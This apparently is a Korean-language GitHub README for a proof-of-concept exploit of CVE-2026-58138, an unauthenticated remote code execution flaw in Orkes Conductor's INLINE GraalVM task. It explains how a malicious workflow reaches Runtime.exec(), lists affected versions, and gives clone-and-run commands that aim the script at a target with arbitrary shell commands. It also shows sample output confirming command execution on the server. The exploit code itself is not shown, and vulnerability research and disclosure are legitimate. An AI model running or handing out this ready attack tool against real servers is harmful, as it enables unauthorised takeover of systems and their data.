
CVE-2026-58138 - Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator
Orkes Conductor의 심각한 원격 코드 실행 취약점
CVE-2026-58138는 Orkes Conductor 버전 3.21.21부터 3.30.1까지 영향을 미치는 심각한 인증되지 않은 원격 코드 실행(RCE) 취약점입니다. 이 취약점으로 인해 공격자는 인증 없이 Conductor 서버에서 임의의 명령을 실행할 수 있으며, 잠재적으로 전체 시스템을 손상시킬 수 있습니다.
취약점은 Orkes Conductor의 워크플로 엔진 내 INLINE 작업 유형에 존재합니다. INLINE 작업은 eval을 통해 Java 객체에 접근할 수 있는 JavaScript 평가를 지원하며, 공격자는 다음을 수행할 수 있습니다:
INLINE 작업을 포함하는 악성 워크플로 등록java.lang.Runtime.exec()를 통해 Conductor 서버에서 시스템 명령 실행| 버전 범위 | 상태 |
|---|---|
| 3.21.21 - 3.30.1 | ✅ 취약 |
| > 3.30.1 | ❌ 패치됨 |
# 저장소 복제
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138
# 스크립트 실행 권한 부여
chmod +x CVE-2026-58138.py
# 설치 확인
python3 CVE-2026-58138.py --help
# 기본 사용법
python3 CVE-2026-58138.py http://target:8080
# 사용자 정의 명령
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC
[*] target = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12
3.30.2 이상으로교육 및 보안 연구 목적으로만 사용하십시오. 소유한 시스템이나 명시적 테스트 허가를 받은 시스템에서만 사용하세요.
⭐ 도움이 되셨나요? GitHub에 별표를 눌러주세요 ⭐